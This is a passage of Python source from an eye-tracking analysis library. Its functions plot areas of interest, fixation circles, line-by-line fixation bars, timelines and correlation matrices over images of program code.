time_between_fixes\n\n# AOI plots {{{\n\ndef draw_rectangles(aoi_rectangles, screen_image, colors=None,\n outline=\"black\", alpha=0.5, color_func=None):\n \"\"\"Draws AOI rectangles on to an image.\n \n Parameters\n ----------\n aoi_rectangles : pandas DataFrame\n DataFrame with a row for each rectangle (x, y, width, height columns)\n\n screen_image : PIL Image\n Image on top of which AOI rectangles will be drawn\n\n colors : list or None, optional\n List of PIL fill colors for each AOI kind. Colors will by cycled through\n if there are more AOI kinds than colors. If None, kelly_colors are used.\n Default is None (kelly_colors).\n\n outline : str or callable, optional\n Rectangle outline color (default is 'black'). If callable, the function\n is called for each rectangle with the AOI's kind, name, and local id.\n\n alpha : float, optional\n Transparency of AOI rectangles (0-1, 1 = opaque).\n Default is 0.5 (50% transparency).\n\n color_func : callable or None, optional\n Function to determine rectangle fill color. If not None, this function\n is used instead of colors. Called for each rectangle with the AOI's\n kind, name, and local id. 
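Editor's aside on the 8-puzzle solver above (asn1.py): the long if/elif ladder in sortQueueUsingManhattan spells out one goal coordinate per tile. The sketch below is a compact alternative, not part of any record in this dataset. It assumes the goal layout [[0,1,2],[3,4,5],[6,7,8]] implied by the coordinate table in the original code, so tile n's goal cell is simply divmod(n, 3).

```python
# Compact Manhattan-distance heuristic for the 8-puzzle (editorial sketch).
# Assumes the goal state [[0,1,2],[3,4,5],[6,7,8]], matching the per-tile
# goal coordinates listed in sortQueueUsingManhattan above.

def manhattan_h(board):
    """Sum of Manhattan distances of tiles 1-8 from their goal cells."""
    h = 0
    for row in range(3):
        for col in range(3):
            tile = board[row][col]
            if tile == 0:
                continue  # the blank tile does not contribute to h(n)
            goal_row, goal_col = divmod(tile, 3)
            h += abs(goal_row - row) + abs(goal_col - col)
    return h

if __name__ == "__main__":
    # One move away from the goal (blank swapped with tile 1) -> prints 1
    print(manhattan_h([[1, 0, 2], [3, 4, 5], [6, 7, 8]]))
```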
Default is None (use colors).\n\n Returns\n -------\n img : PIL Image\n Screen image with AOI rectangles drawn on top\n \n \"\"\"\n rect_image = Image.new(\"RGBA\", screen_image.size)\n draw = ImageDraw.Draw(rect_image)\n\n if colors is None:\n colors = kelly_colors\n colors = it.cycle(colors)\n\n if color_func is None:\n color_func = lambda k, n, li: colors.next()\n\n if not callable(outline):\n outline_color = outline\n outline = lambda k, n, li: outline_color\n\n row_cols = [\"x\", \"y\", \"width\", \"height\", \"name\", \"local_id\"]\n for kind, kind_rows in aoi_rectangles.groupby(\"kind\"):\n for x, y, w, h, name, local_id in kind_rows[row_cols].values:\n draw.rectangle([(x, y), (x + w - 1, y + h - 1)],\n fill=color_func(kind, name, local_id),\n outline=outline(kind, name, local_id))\n\n del draw\n\n # Extract alpha channel and increase from 0 to alpha parameter\n rect_alpha = rect_image.split()[3]\n rect_image.putalpha(ImageEnhance.Brightness(rect_alpha).enhance(alpha))\n\n # Blend on to screen image with alpha\n return Image.composite(rect_image, screen_image, rect_image)\n\ndef aoi_transitions(trans_matrix, name_map=None,\n show_probs=True, ax=None, cmap=None,\n figsize=None, show_colorbar=True,\n prob_threshold=0.0, min_size=(5, 4)): \n \"\"\"Plots an AOI transition matrix with a colorbar.\n\n See also\n --------\n aoi.transition_matrix\n\n aoi.scanpath_from_fixations\n \n \"\"\"\n rows = np.arange(trans_matrix.shape[0])\n cols = np.arange(trans_matrix.shape[1])\n\n if ax is None:\n if figsize is None:\n w, h = trans_matrix.shape[:2]\n figsize = (max(min_size[0], w * 0.75),\n max(min_size[1], h * 0.5))\n pyplot.figure(figsize=figsize)\n ax = pyplot.axes()\n\n if cmap is None:\n cmap = cm.gist_gray_r\n\n polys = ax.pcolor(trans_matrix, cmap=cmap,\n edgecolors=\"#000000\", vmin=0, vmax=1)\n ax.set_title(\"AOI Transitions\")\n\n # x-axis\n ax.set_xlim(0, len(cols))\n ax.set_xticks(cols + 0.5)\n\n if name_map is None:\n ax.set_xticklabels(cols)\n else:\n ax.set_xticklabels([name_map[c] for c in cols])\n pyplot.setp(ax.get_xticklabels(), rotation=90)\n\n ax.set_xlabel(\"To AOI\")\n\n # y-axis\n ax.set_ylim(0, len(rows))\n ax.set_yticks(rows + 0.5)\n\n if name_map is None:\n ax.set_yticklabels(rows)\n else:\n ax.set_yticklabels([name_map[r] for r in rows])\n\n ax.set_ylabel(\"From AOI\")\n ax.invert_yaxis()\n \n # Probability colorbar\n if show_colorbar:\n cb = ax.figure.colorbar(polys)\n cb.set_label(\"Transition Probability\")\n\n # Probability text labels\n if show_probs:\n for row in rows:\n for col in cols:\n prob = trans_matrix[row, col]\n if prob > prob_threshold:\n cell_rgba = cmap(prob)\n text_color = contrast_color(cell_rgba)\n ax.text(col + 0.5, row + 0.5, \"{0:0.2f}\".format(prob),\n ha=\"center\", va=\"center\", color=text_color)\n\n return ax\n\ndef aoi_barplot(fixations, method=\"time\", ylabel=None,\n scalar=1e-3, aoi_kinds=None, ax=None, figsize=None):\n \"\"\"Plots fixation time or counts for all AOI kinds and names.\n\n Parameters\n ----------\n fixations : pandas DataFrame\n DataFrame with one row per fixation and AOI hits. Must have duration_ms\n and start_ms columns.\n \n method : str or callable, optional\n Method for determining height of bars. 
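Editor's aside on aoi_transitions above: its docstring defers to aoi.transition_matrix for how the matrix is computed. The sketch below is an independent illustration, not the eyecode implementation. It builds a row-stochastic first-order transition matrix from a scanpath of AOI indices, matching the 0..1 probability range that aoi_transitions plots.

```python
# Editorial sketch: one way to build the kind of transition matrix that
# aoi_transitions() expects. The real computation lives in
# aoi.transition_matrix; this only illustrates the expected shape.
import numpy as np

def transition_matrix_from_scanpath(scanpath, n_aois):
    counts = np.zeros((n_aois, n_aois))
    for src, dst in zip(scanpath[:-1], scanpath[1:]):
        counts[src, dst] += 1
    row_sums = counts.sum(axis=1, keepdims=True)
    row_sums[row_sums == 0] = 1  # avoid dividing rows that were never left
    return counts / row_sums

if __name__ == "__main__":
    # AOI indices visited in order; each row of the result sums to 1
    print(transition_matrix_from_scanpath([0, 1, 1, 2, 0, 1], n_aois=3))
```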
May be one of:\n * 'time' - total fixation duration\n * 'count' - number of fixations\n * 'first' - time of first fixation\n or a callable with 2 arguments (frame, column) where\n * frame is the fixations DataFrame\n * column is the name of the AOI column\n that returns the height of the bar for the given AOI.\n Default is 'time'.\n\n ylabel : str or None, optional\n Label used for the y-axis. If None, a label is chosen depending on the\n method (time, count, or first).\n\n scalar : float, optional\n Number used to scale the height of bars. This is 0.001 by default,\n meaning time units will be in seconds rather than milliseconds.\n\n aoi_kinds : str or list, optional\n AOI kinds to plot. If None (default), all kinds are plotted.\n\n ax : matplotlib Axes or None, optional\n An Axes to plot onto or None to create a new one (default: None)\n\n figsize : tuple or None, optional\n Size of figure in inches when creating new Axes (width, height).\n If None, default figsize is used (default: None).\n\n Returns\n -------\n ax : matplotlib Axes\n\n \"\"\"\n\n if ax is None:\n pyplot.figure(figsize=figsize)\n ax = pyplot.axes()\n\n if aoi_kinds is None:\n aoi_kinds = get_aoi_kinds(fixations)\n elif isinstance(aoi_kinds, str):\n aoi_kinds = [aoi_kinds]\n\n colors = it.cycle(kelly_colors)\n\n if method == \"time\":\n method = lambda f, c: f[[c, \"duration_ms\"]]\\\n .groupby(c)[\"duration_ms\"].sum()\n ylabel = ylabel or \"Duration (sec)\"\n elif method == \"first\":\n method = lambda f, c: f[[c, \"start_ms\"]]\\\n .groupby(c)[\"start_ms\"].min()\n ylabel = ylabel or \"First Fixation (sec)\"\n elif method == \"count\":\n method = lambda f, c: f[[c]]\\\n .groupby(c).size()\n ylabel = ylabel or \"Fixation Count\"\n scalar = 1.0\n\n bottom_start = 0\n xticks = []\n xlabels = []\n width = 1.0\n for kind, color in zip(aoi_kinds, colors):\n col = kind_to_col(kind)\n times = method(fixations, col) * scalar\n ind = np.arange(len(times)) + bottom_start\n data = np.array(times)\n ax.bar(ind, data, width=width, color=color, label=kind)\n \n for i, name in enumerate(times.index):\n xticks.append(bottom_start + (width / 1.75) + i)\n xlabels.append(name)\n \n bottom_start += len(times) + 2\n\n ax.set_title(\"Fixations by AOI\")\n ax.set_xlim(-1, len(xticks) + (len(aoi_kinds) * 2) - 1)\n ax.set_xticks(xticks)\n ax.set_xticklabels(xlabels, rotation=90)\n\n ax.grid()\n\n if ylabel is not None:\n ax.set_ylabel(ylabel)\n\n ax.legend(bbox_to_anchor=(1.1, 1.05))\n\n return ax\n\n# }}}\n\n# Fixation plots {{{\n\ndef fix_circles(fixations, screen_image, radius_min=10, radius_max=35, fill=\"red\",\n outline=\"black\", alpha=0.8, saccade_lines=True, line_fill=None):\n \"\"\"Draws fixation circles on an image with optional saccade lines.\n\n Circle radii are scaled by fixation duration, with the longest fixation mapping\n to radius_max and the shortest mapping to radius_min.\n \n Parameters\n ----------\n fixations : pandas DataFrame\n DataFrame with fixations and fix_x, fix_y, start_ms, duration_ms columns\n\n screen_image : PIL Image\n Image on top of which fixation circles will be drawn\n\n radius_min : int, optional\n Minimum radius of fixation circles (pixels)\n\n radius_max : int, optional\n Maximum radius of fixation circles (pixels)\n\n fill : str, optional\n PIL fill color of the fixation circles (default: 'red')\n\n outline : str, optional\n PIL outline color for fixation circles (default: 'black')\n\n alpha : float, optional\n Transparency of fixation circles (0-1, 1 = opaque).\n Default is 0.8 (20% transparent).\n\n 
saccade_lines : bool, optional\n If True, draw saccade lines between each fixation circle.\n Default is True.\n\n line_fill : str or None, optional\n Color of saccade lines or None to use fill color.\n Default is None.\n\n Returns\n -------\n img : PIL Image\n Screen image with fixation circles and saccade lines drawn on top.\n \n \"\"\"\n poly_image = Image.new(\"RGBA\", screen_image.size, (0, 0, 0, 0))\n draw = ImageDraw.Draw(poly_image)\n min_duration, max_duration = fixations.duration_ms.min(), fixations.duration_ms.max()\n\n if radius_min > radius_max:\n radius_max = radius_min\n\n if line_fill is None:\n line_fill = fill\n\n # Draw fixation circles\n last_xy = None\n for _, fix in fixations.sort(\"start_ms\").iterrows():\n x, y = fix[\"fix_x\"], fix[\"fix_y\"]\n\n # Draw saccade line\n if saccade_lines and last_xy:\n draw.line((last_xy[0], last_xy[1], x, y), fill=line_fill)\n\n # Calculate circle radius (transform from duration to radius)\n r = (radius_min + \n ((radius_max - radius_min) *\n ((fix[\"duration_ms\"] - min_duration) / float(max_duration - min_duration))\n )\n )\n\n # Happens if all fixations have the same duration\n if np.isnan(r):\n r = radius_min\n\n bbox = (x - r, y - r, x + r, y + r)\n draw.ellipse(bbox, fill=fill, outline=outline)\n last_xy = (x, y)\n\n # Flush drawing operations\n del draw\n\n # Extract alpha channel and increase from 0 to alpha parameter\n poly_alpha = poly_image.split()[3]\n poly_image.putalpha(ImageEnhance.Brightness(poly_alpha).enhance(alpha))\n\n # Blend circles on to screen image with alpha\n return Image.composite(poly_image, screen_image, poly_image)\n\ndef highlight_code(code, lexer=None, formatter=None, filename=None,\n style=\"default\", font_name=None, font_size=19,\n image_pad=10, line_pad=8, line_numbers=False):\n \"\"\"Highlights code using Pygments.\n \n Parameters\n ----------\n code : str\n Code string to highlight\n\n lexer : Pygments lexer or None, optional\n Lexer to use or None to guess one from filename (default: None)\n\n formatter : Pygments formatter or None, optional\n Formatter to use or None for png formatter with options\n specified by arguments below (default: None)\n\n filename : str or None, optional\n Filename used to guess a lexer when none is provided (default: None)\n\n style : str\n Highlighting style (default: 'default')\n\n font_name : str\n Name of font to use or None for the formatter's default (default: None)\n\n font_size : int\n Size of font to use in points (default: 19)\n\n image_pad : int\n Padding around image in pixels (default: 10)\n\n line_pad : int\n Extra padding for new lines in pixels (default: 8)\n\n line_numbers : bool\n True if Pygments should add line numbers (default: False)\n\n Returns\n -------\n img : PIL Image\n Image with highlighted code\n \n \"\"\"\n\n import pygments\n from pygments import formatters, lexers\n if lexer is None:\n msg = \"filename is required if no lexer is provided\"\n assert filename is not None, msg\n lexer = pygments.lexers.guess_lexer_for_filename(filename, code)\n\n # Create formatter if not provided\n formatter = formatter or formatters.get_formatter_by_name(\"png\",\n style=style, font_name=font_name,\n font_size=font_size, line_numbers=line_numbers,\n image_pad=image_pad, line_pad=line_pad)\n\n # Highlight code\n if not isinstance(code, str):\n # Convert to a single string\n code = \"\\n\".join([line.rstrip() for line in code])\n\n png_data = pygments.highlight(code, lexer, formatter)\n\n # Convert to PIL Image\n code_image = Image.open(StringIO(png_data))\n return code_image\n\ndef line_code_image(line_fixes, code_image, num_lines, method=\"time\",\n image_padding=10, image_dpi=120, 
bar_height=0.75, bar_mult=1.0,\n width_inches=5, color=None, horiz_sep=0,\n line_numbers=False, **kwargs):\n \"\"\"Plots fixation information as bars next to code lines.\n \n Parameters\n ----------\n line_fixes : pandas DataFrame\n DataFrame with one fixation per row + line annotation. Must have\n columns start_ms, duration_ms, line.\n\n code_image : PIL Image\n Image with highlighted code (see plot.highlight_code)\n\n num_lines : int\n Number of lines in the code\n\n method : str or callable, optional\n Method for determining size of line bars. May be one of:\n * 'time' - total fixation duration\n * 'count' - number of fixations\n * 'first' - time of first fixation\n or a callable with 2 arguments (frame, lines) where\n * frame is the line_fixes DataFrame\n * lines is a list of line numbers\n that returns a list of bar heights for each line.\n Default is 'time'.\n\n image_padding : int, optional\n Padding expected around image in pixels (default: 10) \n\n image_dpi : int, optional\n Dots per inch for final rendered image\n\n bar_height : float, optional\n Height (or thickness) of horizontal bars (default: 0.75)\n\n bar_mult : float, optional\n Factor to multiply bars' vertical positions by (default: 1.0)\n\n width_inches : float, optional\n Width of final rendered image in inches\n\n color : str or None, optional\n Color of bars or None for automatic selection\n\n horiz_sep : int, optional\n Separation between bars and code image in pixels (default: 0)\n\n **kwargs : keyword arguments\n Arguments passed through to matplotlib barh function\n\n Returns\n -------\n img : PIL Image\n Image with bars and code combined\n \n \"\"\"\n\n assert num_lines > 0, \"Must have more than 0 lines\"\n\n # Check for known methods (time, count, first)\n if method == \"time\":\n # Total fixation duration per line\n method = lambda frame, lines: [sum(frame[frame.line == line].duration_ms) for line in lines]\n color = color or kelly_colors[0]\n elif method == \"count\":\n # Number of fixations per line\n method = lambda frame, lines: [sum(frame.line == line) for line in lines]\n color = color or kelly_colors[1]\n elif method == \"first\":\n # Time of first fixation per line\n method = lambda frame, lines: [frame[frame.line == line].start_ms.min() for line in lines]\n color = color or kelly_colors[2]\n\n lines = np.arange(1, num_lines + 1)\n \n # Plot bar graph with no axes or labels\n height_inches = (code_image.size[1] - (image_padding * 2)) / float(image_dpi)\n\n if line_numbers:\n # Leave a little room for the line numbers\n fig, ax = pyplot.subplots(figsize=(width_inches, height_inches), dpi=image_dpi)\n ax.set_position([0, 0, 0.9, 1])\n ax.set_frame_on(False)\n else:\n # Take the entire figure space\n fig = pyplot.figure(figsize=(width_inches, height_inches), dpi=image_dpi)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n ax.barh(lines * bar_mult, method(line_fixes, lines), height=bar_height,\n color=color, **kwargs)\n\n # Show every line\n ax.set_yticks(0.5 + lines)\n \n # Don't include line 0\n ax.set_ylim(1, num_lines + 1)\n \n # Lines start at 1 on top\n ax.invert_yaxis()\n \n # Bars go from right to left\n ax.invert_xaxis()\n\n if line_numbers:\n # Put line numbers on the right\n ax.set_yticklabels(np.arange(1, num_lines + 1))\n ax.yaxis.tick_right()\n\n # Align line number labels\n for label in ax.yaxis.get_ticklabels():\n label.set_verticalalignment(\"center\")\n \n # Hide tick lines\n for tic in it.chain(ax.xaxis.get_major_ticks(),\n ax.yaxis.get_major_ticks()):\n 
tic.tick1On = False\n tic.tick2On = False\n\n # Combine with code image\n plot_buffer = StringIO()\n fig.savefig(plot_buffer, format=\"png\", dpi=image_dpi)\n pyplot.close(fig)\n plot_buffer.pos = 0\n plot_image = Image.open(plot_buffer)\n \n # Create combined image\n master_width = plot_image.size[0] + horiz_sep + code_image.size[0]\n master_image = Image.new(\"RGBA\", (master_width, code_image.size[1]),\n (255, 255, 255, 255))\n\n # Paste bar plot (left) and code (right)\n master_image.paste(plot_image, (0, image_padding))\n master_image.paste(code_image, (plot_image.size[0] + horiz_sep, 0))\n\n return master_image\n\n\ndef fix_timeline(line_fixes, num_lines, output_fixes=None,\n ax=None, figsize=None, barebones=False):\n \"\"\"Plots a timeline of line fixations by seconds.\n\n Parameters\n ----------\n line_fixes : pandas DataFrame\n DataFrame with one fixation per row + line annotation. Must have\n columns start_ms, end_ms, line.\n\n num_lines : int\n Number of lines in the program\n\n output_fixes : pandas DataFrame or None, optional\n DataFrame with fixations on the output box (interface kind).\n If None, only line fixations are displayed (default: None).\n\n ax : matplotlib Axes or None, optional\n An Axes to plot onto or None to create a new one (default: None)\n\n figsize : tuple or None, optional\n Size of figure in inches when creating new Axes (width, height).\n If None, default figsize is used (default: None).\n\n Returns\n -------\n ax : matplotlib Axes\n Axes with timeline plotted on top\n \n \"\"\"\n assert num_lines > 0, \"Must have more than 0 lines\"\n \n # Gather list of times and line numbers (output box is line 0)\n times_lines = dict(list(line_fixes[[\"start_ms\", \"line\"]].values) +\n list(line_fixes[[\"end_ms\", \"line\"]].values))\n\n if output_fixes is not None:\n times_lines.update(dict([(t, 0) for t in output_fixes.start_ms] +\n [(t, 0) for t in output_fixes.end_ms]))\n \n sorted_times = sorted(times_lines.keys())\n sorted_lines = [times_lines[k] for k in sorted_times]\n max_time = max(sorted_times)\n \n # Plot fixation lines and points\n if ax is None:\n if figsize is None:\n fig_width = int(np.ceil(max_time / 1000.0 / 2))\n fig_height = int(np.ceil((num_lines + 1) / 2.0))\n figsize = (fig_width, fig_height)\n pyplot.figure(figsize=figsize)\n ax = pyplot.axes()\n\n ax.plot(sorted_times, sorted_lines, linewidth=2)\n if not barebones:\n ax.scatter(sorted_times, sorted_lines, marker=\"o\", alpha=0.5, color=\"red\", s=50)\n ax.grid()\n ax.set_title(\"Fixations By Line\")\n \n # Line 1 is at the top (output box is above it)\n if output_fixes is not None:\n lines = np.arange(0, num_lines + 1)\n ax.set_yticks(lines)\n ax.set_ylim(-0.5, num_lines + 0.5)\n if not barebones:\n ax.set_yticklabels([\"Output\\nTextbox\"] + [str(l) for l in lines[1:]])\n\n # Separate output box from other lines\n ax.axhline(0.5, color=\"black\", linestyle=\"--\", linewidth=2)\n else:\n lines = np.arange(1, num_lines + 1)\n ax.set_ylim(0.5, num_lines + 0.5)\n ax.set_yticks(lines)\n if not barebones:\n ax.set_yticklabels(lines)\n\n if not barebones:\n ax.set_ylabel(\"Line\")\n ax.invert_yaxis()\n \n # Show time in seconds instead of millis\n ax.xaxis.set_major_formatter(FuncFormatter(lambda x, pos: int(x / 1000)))\n ax.xaxis.set_major_locator(MultipleLocator(1000))\n ax.set_xlim(-500, max_time + 1000)\n if not barebones:\n ax.set_xlabel(\"Time (seconds)\")\n else:\n ax.set_frame_on(False)\n ax.set_xticklabels([])\n ax.set_xticks([])\n ax.set_yticklabels([])\n ax.set_yticks([])\n \n return 
ax\n\n# }}}\n\n# Metric plots {{{\n\ndef rolling_metrics(results, columns=None, names=None, colors=None,\n markersize=5, ax=None, figsize=None):\n from matplotlib.ticker import MultipleLocator, FormatStrFormatter, FuncFormatter\n\n if columns is None:\n columns = [results.columns[0]]\n\n fig = None\n if ax is None:\n fig = pyplot.figure(figsize=figsize)\n ax = pyplot.axes()\n else:\n fig = ax.figure\n \n axes = [ax] + [ax.twinx() for c in columns[1:]]\n\n if colors is None:\n colors = [\"r\", \"g\", \"b\", \"y\", \"purple\", \"orange\", \"black\"]\n colors = it.cycle(colors)\n\n if names is None:\n names = columns\n elif isinstance(names, str):\n names = [names]\n \n if len(columns) > 2:\n fig.subplots_adjust(left=0, right=0.75)\n axes[2].spines['right'].set_position(('axes', 1.1))\n axes[2].set_frame_on(True)\n axes[2].patch.set_visible(False)\n \n # Plot left y-axis\n color = next(colors)\n axes[0].plot(results.index, results[columns[0]], color=color, marker=\"o\",\n markersize=markersize, label=names[0])\n axes[0].set_ylabel(names[0], color=color)\n axes[0].tick_params(axis=\"y\", colors=color)\n \n if len(columns) > 1:\n # Plot right y-axis\n color = next(colors)\n axes[1].plot(results.index, results[columns[1]], color=color, marker=\"*\",\n markersize=markersize, label=names[1])\n axes[1].set_ylabel(names[1], color=color)\n axes[1].tick_params(axis=\"y\", colors=color)\n \n if len(columns) > 2:\n color = next(colors)\n axes[2].plot(results.index, results[columns[2]], color=color, marker=\"^\",\n markersize=markersize, label=names[2])\n axes[2].set_ylabel(names[2], color=color)\n axes[2].tick_params(axis=\"y\", colors=color)\n \n # Adjust x-axis to seconds\n ax.set_xlabel(\"Time (sec)\")\n ax.xaxis.set_major_formatter(FuncFormatter(lambda x, pos: str(int(x) / 1000)))\n ax.xaxis.set_major_locator(MultipleLocator(5000))\n for label in ax.get_xticklabels():\n label.set_rotation(90)\n \n return ax\n\ndef find_font(name=\"monospace\"):\n from matplotlib import font_manager\n return font_manager.findfont(name)\n\ndef text_size(font_path, font_size, text=\"|\"):\n from PIL import Image, ImageDraw, ImageFont\n font = ImageFont.truetype(font_path, font_size)\n draw = ImageDraw.Draw(Image.new(\"1\", (1, 1)))\n size = draw.textsize(text, font=font)\n del draw\n return size\n\ndef draw_code(code, font_path=None, font_size=18,\n font=None, image=None, line_offset=5, offset=(0, 0),\n padding=(0, 0), fill=\"black\", bg_color=\"white\"):\n \"\"\"Renders code on to a background image with a given font and spacing.\n \n Parameters\n ----------\n code : str or list\n Code to render as a string or a list of lines. If a str, the code will\n be split by '\\\\n'.\n\n font_path : str, optional\n Path to a truetype font for rendering the code. If None and font is not\n provided, the system's default monospace font will be used (default:\n None).\n\n font_size : int, optional\n Size of font in pixels (default: 18).\n\n font : PIL ImageFont, optional\n Font to use for rendering. If provided, font_path is ignored (default:\n None).\n\n image : PIL.Image, optional\n Background image behind rendered code. 
If None, a new image is created\n to contain the rendered lines and filled with bg_color (default: None).\n\n line_offset : int, optional\n Number of pixels between lines of code (default: 5).\n\n offset : tuple of int, optional\n Horizontal and vertical offset from top-left corner for rendered code\n in pixels (default: (0, 0)).\n\n padding : tuple of int, optional\n Symmetric horizontal and vertical padding around rendered code if\n background image is not provided (default: (0, 0)).\n\n fill : str, optional\n Fill color for rendered code (default: 'black').\n\n bg_color : str, optional \n Fill color for background if background image is not provided (default:\n 'white').\n \n Returns\n -------\n code_image : PIL.Image\n Image with code rendered on top of background.\n\n Notes\n -----\n Requires the PIL image library: http://www.pythonware.com/products/pil/\n \n \"\"\"\n from PIL import Image, ImageDraw, ImageFont\n\n if font is None:\n if font_path is None:\n # Look up system monospace font\n font_path = find_font()\n font = ImageFont.truetype(font_path, font_size)\n\n # If code is a string, split into lines\n if isinstance(code, str):\n lines = code.split(\"\\n\")\n else:\n lines = code\n\n # Create background image to fit rendered code\n if image is None:\n temp_image = Image.new(\"RGB\", (1, 1))\n draw = ImageDraw.Draw(temp_image)\n max_x, max_y = offset\n for line in lines:\n line_size = draw.textsize(line.rstrip(), font=font)\n max_x = max(max_x, offset[0] + line_size[0])\n max_y += font_size + line_offset\n\n max_x = int(np.ceil(max_x)) + padding[0]\n max_y = int(np.ceil(max_y)) + padding[1]\n image = Image.new(\"RGB\", (max_x + 1, max_y + 1), bg_color)\n del draw, temp_image\n\n draw = ImageDraw.Draw(image)\n\n # Draw code text onto background image\n y = offset[1]\n for i, line in enumerate(lines):\n x = offset[0]\n draw.text((x, y), line.rstrip(), font=font, fill=fill)\n y += font_size + line_offset\n\n del draw\n return image\n\n# }}}\n\n\ndef correlation_matrix(frame, cols, ax=None, figsize=None,\n label_size=\"small\", alpha=0.05, label_threshold=0.2,\n add_legend=True, method=\"spearman\"):\n if ax is None:\n fig, ax = pyplot.subplots(1, 1, figsize=figsize)\n\n title = \"\"\n if isinstance(method, str):\n title = method.capitalize() + \" \"\n\n ax.set_title(\"{0}Correlation Matrix ({1} columns)\".format(title, len(cols)))\n\n corr2d, sig2d = permute_correlation_matrix(frame[cols], method=method)\n text2d = np.empty(shape=(len(cols), len(cols)), dtype=object)\n num_steps = 100\n\n for i, col1 in enumerate(cols):\n for j, col2 in enumerate(cols):\n if i != j:\n r = corr2d[i, j]\n corr2d[i, j] = num_steps + (num_steps * r)\n if sig2d[i, j]:\n text2d[i, j] = \"{0:.0f}\".format(abs(r) * 100)\n if r < 0:\n text2d[i, j] = \"({0})\".format(text2d[i, j])\n else:\n text2d[i, j] = \"\"\n else:\n corr2d[i, j] = np.nan\n\n cdict = { \"blue\" : [(0.0, 0.0, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.0, 0.0)],\n\n \"red\" : [(0.0, 1.0, 1.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.0, 0.0)],\n \n \"green\" : [(0.0, 0.0, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 1.0, 1.0)]}\n\n cmap = LinearSegmentedColormap(\"heat\", cdict, N=(num_steps * 2))\n masked = np.ma.masked_where(np.isnan(corr2d), corr2d)\n ax.set_axis_bgcolor(\"#CCCCCC\")\n meshes = ax.pcolor(masked, cmap=cmap, edgecolors=\"#000000\", vmin=0, vmax=(num_steps * 2))\n \n for i in range(len(cols)):\n for j in range(len(cols)):\n if (i != j) and text2d[i, j] is not None:\n pyplot.text(i + 0.5, j + 0.5, text2d[i, j],\n horizontalalignment=\"center\",\n 
verticalalignment=\"center\",\n size=label_size)\n\n fig = ax.figure\n if add_legend:\n cb = fig.colorbar(meshes, ticks=[0, num_steps, num_steps * 2],\n format=pyplot.FixedFormatter([\"-1\", \"0\", \"1\"]))\n\n cb.set_label(\"{0}Correlation (x100)\".format(title))\n\n # Set exact limits\n ax.set_xlim((0, len(cols)))\n ax.set_ylim((0, len(cols)))\n\n # Label columns\n loc = pyplot.FixedLocator([0.5 + x for x in range(len(cols))])\n ax.xaxis.set_major_locator(loc)\n ax.yaxis.set_major_locator(loc)\n\n tic = pyplot.FixedFormatter(cols)\n ax.xaxis.set_major_formatter(tic)\n ax.yaxis.set_major_formatter(tic)\n\n pyplot.xticks(rotation=90)\n fig.tight_layout()\n\n return ax\n\ndef super_code_image(fixes, line_fixes, num_lines, screen_img, trial,\n trial_aois, aoi_kind=\"code-grid\", cmap=pyplot.cm.OrRd,\n aoi_alpha=0.7, code_padding=5, line_numbers=False,\n time_between=False, between_cmap=pyplot.cm.binary):\n\n # Crop out code image\n line_aois = trial_aois[(trial_aois.kind == \"line\")]\n env = envelope(line_aois, code_padding).irow(0)\n crop_rect = [env[\"x\"], env[\"y\"], env[\"x\"] + env[\"width\"], env[\"y\"] + env[\"height\"]]\n\n # Hit test against grid AOIs\n grid_aois = trial_aois[(trial_aois.kind == aoi_kind)]\n grid_col = kind_to_col(aoi_kind)\n grid_fixes = fixes.dropna(subset=[grid_col])\n grid_counts = grid_fixes.groupby(grid_col).duration_ms.sum()\n max_grid_count = float(max(grid_counts))\n\n def color_grid(kind, name, local_id):\n rel_count = grid_counts.get(name, default=0) / max_grid_count\n return matplotlib.colors.rgb2hex(cmap(rel_count))\n\n outline_func = None\n if time_between:\n sp = scanpath_from_fixations(grid_fixes, aoi_kind)\n fix_between = time_between_fixes(sp)\n between_means = np.log(fix_between.groupby(\"name\").time_ms.mean())\n min_time_between = float(min(between_means))\n max_time_between = float(max(between_means))\n\n def color_outline(kind, name, local_id):\n rel_time = (between_means.get(name, default=0) - min_time_between) / \\\n (max_time_between - min_time_between)\n return matplotlib.colors.rgb2hex(between_cmap(1 - rel_time))\n\n outline_func = color_outline\n\n # Create syntax-based image\n code_box = trial_aois[(trial_aois.kind == \"interface\") &\n (trial_aois.name == \"code box\")].irow(0)\n aoi_img = draw_rectangles(grid_aois, screen_img, color_func=color_grid,\n alpha=aoi_alpha, outline=outline_func)\n code_img = aoi_img.crop(crop_rect)\n\n # Compute line colors based on their associated block fixation times\n block_fixes = fixes.dropna(subset=[kind_to_col(\"block\")])\n block_counts = block_fixes.groupby(\"hit_id_block\").duration_ms.sum()\n block_aois = trial_aois[(trial_aois.kind == \"block\")]\n max_block_count = float(max(block_counts))\n\n colors = [\"w\"] * num_lines\n for idx, row in line_aois.iterrows():\n # Compute associated block for line\n line_num = int(row[\"name\"].split(\" \")[1])\n line_block = block_aois[(row[\"y\"] >= block_aois[\"y\"]) &\n (row[\"y\"] < (block_aois[\"y\"] + block_aois[\"height\"]))]\n\n if len(line_block) > 0:\n # Extract fixation counts for this block and compute color\n block_id = line_block.irow(0)[\"local_id\"]\n rel_count = block_counts.get(block_id, default=0) / max_block_count\n colors[line_num - 1] = matplotlib.colors.rgb2hex(cmap(rel_count))\n \n # Create final image combining lines, blocks, and syntax fixation counts\n return line_code_image(line_fixes, code_img, num_lines, color=colors,\n image_padding=3, bar_height=0.85, bar_mult=1.001, horiz_sep=5,\n method=\"time\", 
line_numbers=line_numbers)\n\ndef aoi_code_image(fixes, screen_img,\n trial_aois, kind=\"code-grid\", cmap=pyplot.cm.OrRd,\n syntax_alpha=0.7, code_padding=5):\n\n # Crop out code image\n line_aois = trial_aois[(trial_aois.kind == \"line\")]\n env = envelope(line_aois, code_padding).irow(0)\n crop_rect = [env[\"x\"], env[\"y\"], env[\"x\"] + env[\"width\"], env[\"y\"] + env[\"height\"]]\n\n # Hit test against grid AOIs\n col = kind_to_col(kind)\n code_aois = trial_aois[(trial_aois.kind == kind)]\n code_fixes = fixes.dropna(subset=[col])\n code_counts = code_fixes.groupby(col).duration_ms.sum()\n max_code_count = float(max(code_counts))\n\n def color_grid(kind, name, local_id):\n rel_count = code_counts.get(name, default=0) / max_code_count\n return matplotlib.colors.rgb2hex(cmap(rel_count))\n\n # Create syntax-based image\n code_box = trial_aois[(trial_aois.kind == \"interface\") &\n (trial_aois.name == \"code box\")].irow(0)\n aoi_img = draw_rectangles(code_aois, screen_img, color_func=color_grid,\n 